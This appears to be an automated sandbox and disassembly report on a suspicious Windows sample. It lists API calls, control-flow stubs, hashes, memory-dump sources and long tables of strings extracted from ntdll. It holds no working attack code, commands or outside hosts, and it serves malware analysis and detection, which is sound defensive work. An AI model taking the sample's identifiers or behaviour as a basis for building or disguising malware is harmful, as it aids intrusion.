                                                                                    • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                                    • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(645X-52,00000111,00000000,00000000), ref: 0041450A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 645X-52$645X-52
                                                                                    • API String ID: 1836367815-2091860764
                                                                                    • Opcode ID: c4f72bdc853723289a22db10a9d1cec04f1a080d9a07d699bdf0e9a2b8ab37cd
                                                                                    • Instruction ID: 54e1db586a8ed4d3b845a663ec751d497c5305db1d23ac70d665123d6daabb63
                                                                                    • Opcode Fuzzy Hash: c4f72bdc853723289a22db10a9d1cec04f1a080d9a07d699bdf0e9a2b8ab37cd
                                                                                    • Instruction Fuzzy Hash: C60104B2D0021C7ADB11AAE19C81DEFBB7CDF80798F40802AFA1467200E27C5E064BB1

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(645X-52,00000111,00000000,00000000), ref: 0041450A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 645X-52$645X-52
                                                                                    • API String ID: 1836367815-2091860764
                                                                                    • Opcode ID: bb53aac6d4ba36bb84e1edfe2d92872795f7251ccc18aa45e00cb7419d99bfc0
                                                                                    • Instruction ID: cece13d8343ac2b6c99a877cb3fd6383ec2a750366bba0476009461c131bd26b
                                                                                    • Opcode Fuzzy Hash: bb53aac6d4ba36bb84e1edfe2d92872795f7251ccc18aa45e00cb7419d99bfc0
                                                                                    • Instruction Fuzzy Hash: 8B01D671D0411976DB11BAA59C81DEFAB7CDE8175CF40805AFA1467200D63C4E464BB4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 327 42cef3-42cf37 call 404a93 call 42de23 RtlAllocateHeap
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041EA04,?,?,00000000,?,0041EA04,?,?,?), ref: 0042CF32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 332 42cf43-42cf87 call 404a93 call 42de23 RtlFreeHeap
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B00017E,00000007,00000000,00000004,00000000,004174C9,000000F4), ref: 0042CF82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 342 42cf93-42cfcc call 404a93 call 42de23 ExitProcess
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,4C682FD1,?,?,4C682FD1), ref: 0042CFC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 347 17e2c0a-17e2c0f 348 17e2c1f-17e2c26 LdrInitializeThunk 347->348 349 17e2c11-17e2c18 347->349
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Strings
                                                                                    • a NULL pointer, xrefs: 01858F90
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01858DB5
                                                                                    • an invalid address, %p, xrefs: 01858F7F
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01858E4B
                                                                                    • This failed because of error %Ix., xrefs: 01858EF6
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01858D8C
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01858FEF
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01858E3F
                                                                                    • The resource is owned shared by %d threads, xrefs: 01858E2E
                                                                                    • *** enter .cxr %p for the context, xrefs: 01858FBD
                                                                                    • *** then kb to get the faulting stack, xrefs: 01858FCC
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01858F26
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01858DD3
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 01858EE2
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01858DA3
                                                                                    • *** enter .exr %p for the exception record, xrefs: 01858FA1
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 01858E24
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 01858E02
                                                                                    • The critical section is owned by thread %p., xrefs: 01858E69
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01858E86
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01858F2D
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 01858F3F
                                                                                    • read from, xrefs: 01858F5D, 01858F62
                                                                                    • *** Inpage error in %ws:%s, xrefs: 01858EC8
                                                                                    • The instruction at %p tried to %s , xrefs: 01858F66
                                                                                    • write to, xrefs: 01858F56
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01858F34
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01858DC4
                                                                                    • <unknown>, xrefs: 01858D2E, 01858D81, 01858E00, 01858E49, 01858EC7, 01858F3E
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 01858E75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    Strings
                                                                                    • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                                                    • double initialized or corrupted critical section, xrefs: 01815508
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                                                    • 8, xrefs: 018152E3
                                                                                    • Invalid debug info address of this critical section, xrefs: 018154B6
                                                                                    • undeleted critical section in freed memory, xrefs: 0181542B
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                                                    • Thread identifier, xrefs: 0181553A
                                                                                    • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                                                    • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                                                    • Critical section address., xrefs: 01815502
                                                                                    • corrupted critical section, xrefs: 018154C2
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    Strings
                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                                                    • @, xrefs: 0181259B
                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                    • API String ID: 0-4009184096
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-3197712848
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    Strings
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                                                    • VerifierFlags, xrefs: 01828C50
                                                                                    • HandleTraces, xrefs: 01828C8F
                                                                                    • VerifierDebug, xrefs: 01828CA5
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                                                    • VerifierDlls, xrefs: 01828CBD
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    Strings
                                                                                    • ***Exception thrown within loader***, xrefs: 01824E27
                                                                                    • LdrpGenericExceptionFilter, xrefs: 01824DFC
                                                                                    • LdrpProtectedCopyMemory, xrefs: 01824DF4
                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01824E38
                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01824DF5
                                                                                    • Execute '.cxr %p' to dump context, xrefs: 01824EB1
                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 01824E06
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-2973941816
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                    • API String ID: 0-1109411897
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                                                    • apphelp.dll, xrefs: 01796496
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                                                    • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    Strings
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                                                    • LdrpInitializeProcess, xrefs: 017DC6C4
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                                                    • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    APIs
                                                                                      • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    Strings
                                                                                    • @, xrefs: 017D8591
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                                                    • LdrpInitializeProcess, xrefs: 017D8422
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    Strings
                                                                                    • .Local, xrefs: 017D28D8
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    Strings
                                                                                    • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                    • API String ID: 0-1245972979
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    Strings
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 0181365C
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01813640, 0181366C
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0181362F
                                                                                    • LdrpFindDllActivationContext, xrefs: 01813636, 01813662
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                                                    • LdrpDynamicShimModule, xrefs: 0180A998
                                                                                    • apphelp.dll, xrefs: 017C2462
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    Strings
                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                                                    • HEAP[%wZ]: , xrefs: 017B3255
                                                                                    • HEAP: , xrefs: 017B3264
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $@
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                                                    • LdrpCheckModule, xrefs: 0180A117
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    Strings
                                                                                    • @, xrefs: 0185C1F1
                                                                                    • PreferredUILanguages, xrefs: 0185C212
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 0182488F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                                                    • LdrpInitializationFailure, xrefs: 018220FA
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
